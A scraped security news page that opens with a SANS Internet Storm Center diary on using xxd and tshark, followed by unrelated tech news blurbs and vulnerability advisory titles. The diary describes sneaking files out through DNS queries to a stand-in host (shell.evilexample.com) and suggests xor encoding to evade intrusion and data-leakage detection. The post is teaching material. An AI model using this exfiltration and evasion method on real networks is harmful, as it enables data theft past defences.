InfoSec News

I just got done teaching For 558, our relatively new Network Forensics class. Great students and some great side discussions. One of this side discussions involved 'xxd', a tool that can be used to create a hex dump from a binary file or reverse a hex dump back into a binary file. For example:
xxd index.html | head -1

0000000: 3c21 444f 4354 5950 4520 6874 6d6c 200a !DOCTYPE html .


The tool is even flexible enough to be used in vi (try:vi -b with !%xxd or !%xxd -r to undo it before saving)
The tool is very handy, two uses that came up in class:
1. Stripping headers and extracting data from a covert channel.
One method to establish a covert channel is to take the original packet, and wrap it into an encapsulating header. For example an ICMPor a DNS packet. The trick is to extract the payload, save it in a new file, and treat it as a new packet capture. The 'packetstan' blog [1] outlines one way to do so via scapy. But scapy is not as commonly installed and available as other tools like for example tshark (and well, xxd).
tshark can easily be used to extract the payload in hexadecimal format:
tshark -T fields -e data
to convert the hexadecimal payload into a binary files, just run it through xxd:
tshark -T fields -e data | xxd -r -p
The -p option will just accept a stream of hexadecimal data, without it, xxd expects it to be encoded in the very specific format usually see with xxd.
2. File transfer via DNS
Another nice idea I demoed in class is a file transfer via DNS that works without special tools. For pentesters, this is helpful as it will first of all sneak past many firewalls, and secondly you do not need to install any special tools that may be picked up by anti-malware.
This idea is along the lines of what is discussed in Kevin Bong's SANS Master's project [2].
First, we convert the file to be transferred via xxd into a hex stream.
xxd -p secret file.hex
next, we read each line from file.hex, and transmit done
This does not need special privileges. On the DNS server, we can capture the messages via tcpdump or the query log.
tcdpump -w /tmp/dns -s0 port 53 and host system.example.com
Then, we extract the messages from the packet capture
tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq received.txt
The uniq may not be necessary, but I find that the DNS messages may be resend once in a while if the response isn't fast enough.
Finally, just reverse the hex encoding:
xxd -r -p receivedu.txt keys.pgp
And you are done! FTDNS (File Transfer via DNS)without installing any special tools on system.example.com
Bonus: shorter lines from xxd and maybe a quick xor may make it even harder for an IDS/Data Leakage system to seethis kind of data.
Defense: Watch you DNS logs!
[1] http://www.packetstan.com/2010/11/packet-payloads-encryption-and-bacon.html

[2] http://sans.edu/student-files/presentations/ftp_nslookup_withnotes.pdf
------

Johannes B. Ullrich, Ph.D.

SANS Technology Institute

Twitter (c) SANS Internet Storm Center. http://isc.sans.org Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Eastman Kodak's patent claim against Apple and Research In Motion concerning camera-phone image previews is invalid, according to an initial determination by a U.S. International Trade Commission administrative law judge.
 
Users of the 4chan online message board managed to get access to the online student information system used by a New Jersey school district after the school's administrative password was posted to 4chan last week.
 
Just like legitimate developers, malware makers want the best return on their investment, a researcher said on Monday, pointing to the the Carberp virus.
 
Hewlett-Packard has invited journalists to an event March 14 where CEO Léo Apotheker is expected to lay out his plans for the company, including anticipated greater investments in enterprise software.
 
Hewlett-Packard has officially consigned its Neoview to history, less than four years after introducing it to the market as the companys core offering in the Business Intelligence space.
 
The current crop of Internet addresses could start to disappear this week if a regional Internet registry makes one more request for two blocks of addresses.
 

Changing the Status Quo for Security
CTO Edge
... showcasing new and emerging technologies and offering practical and professional expertise. For further information please visit www.infosec.co.uk)

 
VMware's fourth-quarter revenue jumped 37 percent as businesses increased spending on its virtualization software, the company announced Monday.
 
Two-thirds of U.S. Internet connections are at speeds less than 5 Mbit/sec., putting the U.S. well behind speed leaders South Korea and Japan.
 
Modern energy efficient technologies are becoming the norm, and most businesses understand that implementing "green IT" helps the environment and the bottom line. But many IT professionals lack a tool that is critical to understanding the full impact of energy efficient practices.
 
Hewlett-Packard has invited journalists to an event March 14 where CEO Léo Apotheker is expected to lay out his plans for the company, including anticipated greater investments in enterprise software.
 
[CFP] LACSEC 2011: 6th Network Security Event for Latin America and the Caribbean
 
Pope Benedict XVI Monday gave his blessing to social networking, urging Catholic Internet users to adopt a respectful Christian netiquette when spreading the Gospel online.
 
Oracle's plans for Java seem to constrain the language to the enterprise, analysts assert
 
Motorola's Xoom tablet will start shipping Feb 17 and will cost about $700, according to Engadget.com.
 
The Clorox company brought in a new CIO to re-establish control of the company’s tech direction, bring IT up to date and generate business value.
 
Information is the lifeblood of business. Valuable corporate data is available to employees, business partners and contractors. It is accessed locally, in the cloud and virtual environments, providing instant access to non-public sensitive information. Making matters worse, employees typically do not ask permission to load third-party software or applications on their laptops and mobile phones -- devices that are connected to their companies' networks and data stores.
 
The new -- and divided -- Congress should find some early agreement on a variety of scaled-back technology bills, analysts say.
 
The departure of longtime Microsoft executive Bob Muglia could prove troubling because the head of the Server and Tools Business was held in high esteem by the company's technical talent, industry watchers say.
 
The proposal, which transmits a special HTTP header to websites, may be supported in future versions of Firefox, but in order for it to fully work, websites must also support the feature.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
Social media career job opportunities tripled in 2010, as compared to 2009. Here's what you need to know about 3 hot positions, plus expert do's and don'ts when you're applying for social media jobs.
 
A day after Mozilla said it was exploring a "Do Not Track" feature for Firefox, Google announced a Chrome add-on that lets users opt out of tracking cookies that monitor their activity online.
 
Eric Schmidt is getting an impressive parting gift of $100 million as he departs Google as CEO, but remains with the company as executive chairman.
 
Twitter's advertising revenue will reach $150 million in 2011 and $250 million next year, according to digital marketing research company eMarketer.
 
Reader Matt Ernst seeks the magic bullet for wirelessly printing from his iPad. He writes:
 
Opera Web Browser 'Select' HTML Element Integer Overflow Vulnerability
 
The price of DRAM, the main memory chips inside personal computers, may tick up in coming months as stronger demand for laptop and desktop computers with new microprocessors from Intel and AMD drives stronger PC buying, analysts and market researchers say.
 
Google Chrome prior to 8.0.552.237 Multiple Security Vulnerabilities
 
Two leading network vendors -- Cisco System and Verizon Business -- have enlisted in an upcoming trial-by-fire of IPv6, the long-anticipated upgrade to the Internet's main communications protocol called IPv4.
 
AWStats Unspecified 'LoadPlugin' Directory Traversal Vulnerability
 
[USN-1048-1] Tomcat vulnerability
 
[USN-1047-1] AWStats vulnerability
 
[SECURITY] [DSA 2150-1] request-tracker3.6 security update
 
phpcms V9 BLind SQL Injection Vulnerability
 
Asus70 asked the Laptops forum for speed-up tips.
 
A piece of banking malware that researchers have been keeping an eye on is adding more sophisticated capabilities to stay hidden on victims' PCs, according to the vendor Seculert.
 
Microsoft's flagship backup and archiving software, Data Protection Manager, has come a long way since we first tested it in 2005.
 
Bored with the usual characters at work? Cue Doris Day, a stylish little brush script from designer Mario Arturo. Named for the patron saint of romantic romps, Doris Day arrives loaded with thoroughly modern charm.
 
The TomTom GO 2505-TM has virtually every feature that you could want in a nonconnected navigation device. And, the company packs all of that into a striking, slim chassis.
 
Editors’ Note: Each week the Macalope skewers the worst of the week’s coverage of Apple and other technology companies. In addition to being a mythical beast, the Macalope is not an employee of Macworld. As a result, the Macalope is always free to criticize any media organization. Even ours.
 
Socialtext, Yammer, Salesforce.com's Chatter and other social collaboration platforms have a new rival in the form of Tibbr, a product that creator Tibco hopes will be the standard for large enterprises.
 
While the standard screen size for GPS navigation devices is 4.3 inches (diagonal), a number of devices now have larger screens. Magellan launched a limited number of devices with 4.7-inch screens last year and expanded the number of different RoadMate 4.7-inch devices to seven, including the RoadMate 3065. But for my driving, I prefer a GPS unit with a 5.0-inch (dia.) screen. The new RoadMate 5045 series features such a 5.0-inch screen and most, but not all, of the features needed to make it an ideal navigation companion.
 
One of the challenges of buying a GPS navigation device is to figure out just which set of features you want. The other lies in deciphering the differences among models in a product line--in this case, the difference between the Nuvi 1350T ($180 list, as of January 21, 2011) and the Nuvi 1370T. One need look no further than the list prices of these two models to know there’s a difference: The similarly featured 1370T is priced at $250 (as of January 21, 2011).
 
Each of the GPS manufacturers offers an almost dizzying array of products--each with just slightly different features. The key challenge in buying a GPS navigation device is to determine which features are must-haves and which ones would just be nice to have. Once you make that determination, buying the perfect GPS becomes simpler. Over the past several years, larger screens have been the trend for dashboard GPS devices. Devices with a 4.3-inch screen have almost completely replaced devices with 3.5-inch screens. Still, some people might prefer a smaller screen device. And, often, but not always, the smaller screens could mean a cheaper price. Such is the case with the Garmin Nuvi 1260T.
 
If you're shopping for a bargain-priced GPS, searching for the previous year's models is often a good place to start. One of the current best finds is the Garmin Nuvi 265WT. While it still carries a hefty list price of $220 on the Garmin Website (as of 1/21/2011), you can generally find it online for $100 less.
 
While a 4.3-inch screen has become the standard size for personal navigation devices, the upgrade to a 5.0-inch screen can make a significant difference. TomTom has two series of XXL products with 5.0-inch screens, the XXL 540-TM and the XXL 550-TM reviewed here ($230, price as of 1/5/2011). At one time, such an upgrade carried a huge premium, but no more: Now the premium can be as little as $40.
 
The TomTom XL 350-TM ($170, price as of 1/5/2011) should appeal to both existing fans of TomTom navigators and newcomers alike. Like other models in the XL 350 series, this unit boasts a 4.3-inch touchscreen.
 
CultBooking 'cultbooking.php' Local File Include and Multiple Cross Site Scripting Vulnerabilities
 
Network demand will explode, fueled by unexpected growth in ambient video, like puppy cams and surveillance video, according to reports from the 33rd Pacific Telecommunications Council (PTC) conference held last week in Hawaii.
 
In the months since we reviewed version 5 of Google’s Chrome Web browser ( Macworld rated 4 out of 5 mice ), the developers in Mountain View have not been slacking off. The latest stable release of this contender for the Mac browser crown now stands at version 8 and counting. While it doesn’t pack many major improvements, the new features it does sport are welcome and well implemented. More importantly, its increased speed and standards compliance help Chrome 8 largely leave the latest version of Safari eating its dust.
 
Gallery Arbitrary File Upload Vulnerability
 
Hewlett-Packard reshuffled its board last week, adding some prominent tech and business veterans that may help it escape its turbulent past and give its CEO, Leo Apotheker, some help.
 
Set for April release, open source IDE includes capabilities for Java SE 7 and Oracle WebLogic Server
 
If you thought the Federal Communications Commission’s vote to approve limited net neutrality rules were the end of the dispute, think again.
 
Mozilla, the developer of the Firefox browser, is working a feature that will allow users to opt-out of online behavioral advertising.
 
SSSD 'pam_parse_in_data_v2()' Local Denial of Service Vulnerability
 
In a down economy, IT isn't going anywhere without Finance. Here's what CFOs would like you to know before you come knocking.
 
Business intelligence systems can be used to analyze data about a company's progress in meeting its environmental goals.
 
Intrusion-protection systems, on average, are getting better at blocking external security threats. But the default settings can produce effectiveness rates as low as 31%, so tuning is crucial to improving the performance of some products.
 
In a Forrester Research survey about investments in ERP systems, 72% of the companies polled said they are 'in a holding pattern for 2011.'
 
Surveys show that 61% of hiring managers expect to increase pay to existing employees; and smaller employers are making fewer cuts in benefits than larger employers.
 
Kathryn Akerman, CIO at Hurley Travel Experts, says that in addition to personal service, her company can offer faster and more complex booking interfaces than customers typically see on online sites.
 
Hewlett-Packard reshuffled its board last week, adding some prominent tech and business veterans that may help it escape its turbulent past and give its CEO, Leo Apotheker, some help.
 
A security manager in a new job is like a gardener assessing the threats that lie below the rocks.
 
In theory, an enterprise app store would allow employees to easily download the software they need, but the idea faces many hurdles, a Gartner analyst says.
 
Follow these 7 tips to protect your IT assets -- and essential company data -- from a service provider breakup gone bad
 
A-V Tronics InetServ SMTP Denial of Service Vulnerability
 
InfoSec News: Is retaliation the answer to cyber attacks?: http://www.networkworld.com/news/2011/012011-retaliation-answer-cyber-attacks.html
By Ellen Messmer Network World January 21, 2011
WASHINGTON, DC -- Should revenge assaults be just another security tool large IT shops use to counter cyber attacks? [...]
 
InfoSec News: Phone-hacking scandal: Scotland Yard accused over investigations: http://www.guardian.co.uk/media/2011/jan/23/phone-hacking-scandal-scotland-yard
By Polly Curtis and James Robinson guardian.co.uk 23 January 2011
Criticisms of the police handling of the phone-hacking scandal intensified tonight after a minister accused Scotland Yard of failing to [...]
 
InfoSec News: Apple taps Navy techie for global security head: http://news.cnet.com/8301-13579_3-20029280-37.html
By Arik Hesseldahl Apple CNet News January 23, 2011
Apple has tapped security expert and author David Rice to be its director of global security, several sources have confirmed to me. He's expected to start at Apple in March. [...]
 
InfoSec News: Got $500? You can buy a hacked U.S. military website: http://www.computerworld.com/s/article/9205905/Got_500_You_can_buy_a_hacked_U.S._military_website
By Robert McMillan IDG News Service January 21, 2011
If you're a criminal looking for full control of the Web used by the U.S. Army's Communications-Electronics Command (CECOM), you can get it [...]
 
InfoSec News: Iranian Police Sets Up Cyber Force: http://english.farsnews.com/newstext.php?nn=8911031262
Fars News Agency 24 Jan 2011
TEHRAN (FNA)- Iran's Cyber Police started its work today to prevent espionage and sabotage activities through the internet, a police official announced on Sunday. [...]
 
Request Tracker Password Information Disclosure Vulnerability
 
Golden FTP Server PASS Command Remote Buffer Overflow Vulnerability
 
We tested RedHat Enterprise Linux 6 on various hypervisor platforms, including VMware, XenServer, and RedHat in our NOC. NOC hardware includes Dell and HP 8 and 16 core AMD and Intel-based servers, a Compellent FC/iSCSI SAN, Extreme Networks switches, along with Windows 2008R2, Apple XServe, and other Linux servers, some in VMs.
 
Three years in the making, Red Hat Enterprise Linux ( RHEL) 6 is a gutsy, green upgrade that features native support for KVM, the Linux kernel-based virtual machine.
 
We setup System Center: Data Protection Manager on a Gigabit Ethernet network consisting of Windows 2008 R2 and Windows 2003 R2 servers, as well as virtualized Windows 7 and Windows XP SP4 clients.
 
Gibbs doesn't believe that technology is the cause of all of our social ills …
 
Five years makes an official franchise, no? Either way, what follows is a truncated-for-print version of our fifth annual collection of the year's "25 Geekiest 25th anniversaries."
 

Posted by InfoSec News on Jan 24

http://www.networkworld.com/news/2011/012011-retaliation-answer-cyber-attacks.html

By Ellen Messmer
Network World
January 21, 2011

WASHINGTON, DC -- Should revenge assaults be just another security tool
large IT shops use to counter cyber attacks?

It's a controversial idea, and the law generally frowns on cyber attacks
in general, but at the Black Hat DC conference last week, some speakers
took up the issue of whether and how organizations...
 

Posted by InfoSec News on Jan 24

http://www.guardian.co.uk/media/2011/jan/23/phone-hacking-scandal-scotland-yard

By Polly Curtis and James Robinson
guardian.co.uk
23 January 2011

Criticisms of the police handling of the phone-hacking scandal
intensified tonight after a minister accused Scotland Yard of failing to
properly investigate the allegations, while it emerged that Gordon Brown
has asked police to establish whether he has been a victim.

Chris Huhne, the Liberal...
 

Posted by InfoSec News on Jan 24

http://news.cnet.com/8301-13579_3-20029280-37.html

By Arik Hesseldahl
Apple
CNet News
January 23, 2011

Apple has tapped security expert and author David Rice to be its
director of global security, several sources have confirmed to me. He's
expected to start at Apple in March.

Apple hasn't returned calls seeking comment.

There's no word yet about what precisely Rice's job will entail, and
knowing secrecy-obsessed Apple, there likely won't...
 

Posted by InfoSec News on Jan 24

http://www.computerworld.com/s/article/9205905/Got_500_You_can_buy_a_hacked_U.S._military_website

By Robert McMillan
IDG News Service
January 21, 2011

If you're a criminal looking for full control of the Web used by the
U.S. Army's Communications-Electronics Command (CECOM), you can get it
for just under US$500.

At least that's what one hacker is offering in underground forums.
Security vendor Imperva found the black market sales pitch...
 

Posted by InfoSec News on Jan 24

http://english.farsnews.com/newstext.php?nn=8911031262

Fars News Agency
24 Jan 2011

TEHRAN (FNA)- Iran's Cyber Police started its work today to prevent
espionage and sabotage activities through the internet, a police
official announced on Sunday.

"The Cyber Police can prevent espionage and sabotage in Information
Technology (IT) tools," Head of the Information Production and Exchange
Department of the Law Enforcement...
 
Sepaton announced version 6.0 of its grid-based backup and deduplication appliance, which now supports 64-bit architectures and doubles the throughput of the device.
 


Internet Storm Center Infocon Status